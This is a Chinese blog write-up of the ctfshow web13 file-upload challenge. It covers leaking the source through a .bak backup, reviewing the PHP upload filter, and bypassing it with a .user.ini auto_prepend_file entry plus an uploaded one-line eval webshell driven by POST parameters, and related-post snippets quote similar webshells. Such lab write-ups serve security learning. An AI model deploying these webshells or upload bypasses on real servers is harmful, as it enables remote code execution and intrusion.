ctfshow web13

已于 2024-09-07 16:17:22 修改
阅读量1.3k 收藏 18
点赞数 22
文章标签: 安全 网络安全
于 2024-09-07 11:41:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_76724233/article/details/141973605
版权

 尝试  常规姿势上传文件

打开网站

初步判定为文件上传漏洞。

随便选择几个文件上传,提示错误

不选择任何文件直接点提交也会报错

打开burpsuite抓包,改掉MIME类型,也就是图示位置,发现也不行,应该不是MIME过滤

一头雾水,只能换个思路。 

------------------------------------------------------这是分割线------------------------------------------------------------

尝试  获取网站源码

通过备份压缩文件获取,常见的文件后缀名有以下这些

.rar  .zip  .7z  .tar.gz  .bak  .txt  .old  .temp

 发现.bak文件能够获取源码

敏感文件泄露的方式有很多,例如  .git、.svn、.hg源码泄露等

常见的利用方式和工具参考这篇文章

k常见的web源码泄露,以及利用方式、利用工具

源代码分析:文件上传漏洞

<?php 
	header("content-type:text/html;charset=utf-8");
    $filename = $_FILES['file']['name'];//获取上传文件的原始文件名。(包含后缀名)
    $tmp_name = $_FILES['file']['tmp_name'];//获取上传文件在服务器的临时存储路径。
    $size = $_FILES['file']['size'];//获取文件的大小,单位为字节。
    $error = $_FILES['file']['error'];//获取文件上传过程中是否发生错误,返回错误代码。
	
    $arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
    //使用 pathinfo() 函数解析文件路径,提取文件的扩展名(extension)
    //并存储到 $ext_suffix 变量中。

    if ($size > 24){
		die("error file zise");
	}//大小限制

	if (strlen($filename)>9){
		die("error file name");
	}//文件名长度限制(包括扩展名)

	if(strlen($ext_suffix)>3){
		die("error suffix");
	}//扩展名长度限制

	if(preg_match("/php/i",$ext_suffix)){
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename)){
        die("error file name");
    }//这两个都是限制文件名里面没有php字样
	if (move_uploaded_file($temp_name, './'.$filename)){
		echo "文件上传成功!";
	}else{
		echo "文件上传失败!";
	}
    //使用 move_uploaded_file() 函数将临时文件移动到指定目录中(此处为当前目录下)。
    //如果上传成功,输出 “文件上传成功!”,否则输出 “文件上传失败!”。
 ?>

 那显而易见,就是上传我们含有构造payload的文件,只是有一些限制。

目标就是写个一句话木马,上传上去。绕过方式也很简单,利用.user.ini文件

.user.ini文件妙用

这里就非常通俗易懂的说一下它的作用,如有口误不必在意(bushi

.user.ini 是一个配置文件,允许用户在特定的目录下为 PHP 运行环境设置一些参数。甚至可以覆盖某些php的全局设置。就比如说在某个目录下有.user.ini文件和1.php文件,你就可以设置.user.ini文件里面的一些参数,1.php执行的时候就会优先按照.设置的来。

至于在文件上传漏洞中主要的参数也就两个  auto_prepend_file  和   auto_append_file
auto_prepend_file表示在每个PHP脚本之前自动加载指定的文件。该文件的内容将被插入到原始脚本的顶部。而autu_append_file无非就是加到文件底部(ps:不过一般还是建议加在顶部,因为文末如果有exit()会无法调用到)

示例:auto_prepend_file = "/path/to/prepend.php"

修改数据包,上传含有payload的文件(也可以在本地把这两个文件写好再上传)

先上传.user.ini文件,其中的1.txt就是我们即将上传的带有一句话木马的文件

现在上传1.txt文件

ps:不管是写成<?php eval($_POST['a']);还是<?= eval($_POST['a']);形式,亦或者是GET方式,经过我测试都可以成功

提交参数,获取flag

通过火狐hackbar插件,在/upload.php目录下提交参数

a=print_r(glob('*'));
//当然,用scandir()函数也可以,print_r(scandir('.'));

结果如下 

得到一个文件名巨长的文件,用highlight_file()函数访问,得到flag

ctfshow web13 文件上传.user.ini
m0_46412682的博客
07-16 2319
ctfshow web13 文件上传 开始的页面 先上传一张正常的照片,显示error file size,这张图片是886k,再上传一张小的照片还是error file size 不管先,上传一句话木马1.php,提示错误,应该是过滤了后缀名 现在上传1.txt,内容为<?php eval($_GET[‘w’]);?>,还是文件大小问题 内容改小一点<?php eval($_GET[w]); 这里我们实现能不能上传.htaccess文件,这里是上传不了 之前再buuctf中有道也是文件
ctfshow web入门 web87
2401_83272517的博客
05-25 1252
入门2年半还没有入门的菜坤的日常wp
ctf.show-web13
2301_79210256的博客
10-07 721
先上传.user.ini文件中的内容, 文件中内容是auto_prepend_file=1.txt。函数这行代码时,它会打印出当前目录下所有文件和目录的列表。auto_prepend_file将文件内容包含在每个脚本执行之前执行。auto_append_file将文件内容包含在每个脚本执行之后之后。.user.ini文件是一个可选的配置文件,它允许开发者和用户在不修改主。函数用于显示一个文件的内容,同时对 PHP 代码进行语法高亮。文件的情况下自定义 PHP 设置,可以覆盖或添加全局。
ctfshow WEB web13
最新发布
weixin_68416970的博客
04-13 440
ctfshow WEB web13
CTFshow-web-web13
qq_68581192的博客
10-27 674
user.ini中两个中的配置就是auto_prepend_file和auto_append_file。这两个配置的意思就是:我们指定一个文件(如1.jpg),那么该文件就会被包含在要执行的php文件中(如index.php),相当于在index.php中插入一句:require(./1.jpg)。由于后缀问题服务器无法解析该php语句,我们先上传a.txt,再上传.user.ini文件。先尝试在url后添加/upload.php.bak,发现直接下载了,我们打开下载的。.DS_Store文件泄漏。
CTF.show:web13
qq_46230755的博客
01-15 2489
扫描后发现存在upload.php.bak .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏 .phps .bak结尾的网页 <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_FILES['file']['tmp_name']; $size = $_FILES.
CTF show WEB13
羽的博客
02-18 5366
题目地址:http://ctf.show 进入题目是个文件上传的题目,尝试了一番文件上传漏洞利用的方法后,没有啥突破,可能有啥隐藏的目录,尝试源码泄露利用的方法,在输入upload.php.bak时成功下载下来源码。 .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏,还有以.phps .bak结尾的网页 在we...
ctf.show_web13
wangzhemvp的博客
04-16 404
在.usr.ini中如果设置了文件名,那么任意一个页面都会将该文件中的内容包含进去。在 .usr.ini 中输入 auto_prepend_file =a.txt,这样在该目录下的所有文件都会包含 a.txt 的内容。auto_prepend_file=a.txt // 意思是所有a.txt文件都以php文件方式打开。上传成功之后,但蚁剑这里连接不上,可能是.txt文件蚁剑无法通过php进行解析吧。要求文件大小少于24字节,文件名少于九个字节,后缀小于三个字节,并且。,文件名不能为php。
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFSHOW web164 PNG二次渲染脚本(生成图片马)
05-04
这段PHP代码创建了一个32x32的真彩色图片,并将一个数组中的RGB值作为像素颜色填充到图片上,最后将图片保存为名为"2.png"的文件。另外,这段代码还暗藏了一个木马内容,可以通过GET请求调用POST请求中的参数作为...
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)
热门推荐
wangyuxiang946的博客
09-11 1万+
ctf.show萌新模块 web13关, 这一关的考点是代码执行漏洞, 需要灵活的运用各种命令执行函数, 源码中过滤了system, exec, highlight函数, cat命令, congfig, php, 点和分号等关键字, 推荐使用反引号`` 进行绕过 页面中展示了部分源码, 并提示 flag 就在 config.php 文件中 源码中过滤了参数中的 system exec highlight cat . ; file php config 等关键字, 这里可以使用 pass...
CTF-show WEB入门--web13
m0_73912575的博客
01-03 611
CTF-show WEB入门--web13
ctfshow web13-14
qq_61988806的博客
12-12 1209
ctfshow web13-14 文件上传的题 想办法搞到源码 常见得到源码的方法 .bak .git .hg 这里使用.bak得到源码 下载得到源码
CTFSHOW 萌新web13
weixin_44833249的博客
07-05 291
冒号这个过滤可以用?>来绕过,让程序运行到这里就终止,而在php中,最后一句话是不需要用分号;相比于12题 多了冒号:,点.file的匹配。
CTFSHOW系列-web13(信息收集-技术文档泄露)
SuperherRo的博客
11-27 692
CTFSHOW系列解题思路
【CTF Web】XCTF GFSJ0485 simple_php Writeup(代码审计+GET请求+PHP弱类型漏洞)
HEX9CF的技术博客
05-06 590
小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。
CTF_ctfshow_web13_文件上传漏洞
weixin_54227009的博客
05-14 1616
打开靶机发现是个文件上传漏洞,上传了图片这些,都提示太大了 10344c8d-1054-45ac-ac38-f99ae5d4e476.challenge.ctf.show/upload.php.bak 然后upload.php.bak下载下来了源码,进行审计: <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_...
CTFshow 信息收集 web13
Kradress的博客
10-23 388
根据提示 技术文档里面不要出现敏感信息,部署到生产环境后及时修改默认密码 查看源码,发现有几个可以访问的网页 仔细查看每个网页的源码后,在Products.html中发现 pdf文件 点开pdf文件,根据信息访问后台,输入账号密码,拿到flag ...
ctfshow web入门 web35
03-29
### CTFShow Web 入门 Web35 的解题思路 CTFShow 平台中的 Web 类别题目通常涉及常见的 Web 安全漏洞,例如 SQL 注入、XSS 跨站脚本攻击以及文件上传等。对于 Web35 这一入门级别的挑战,可以从以下几个方面入手...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值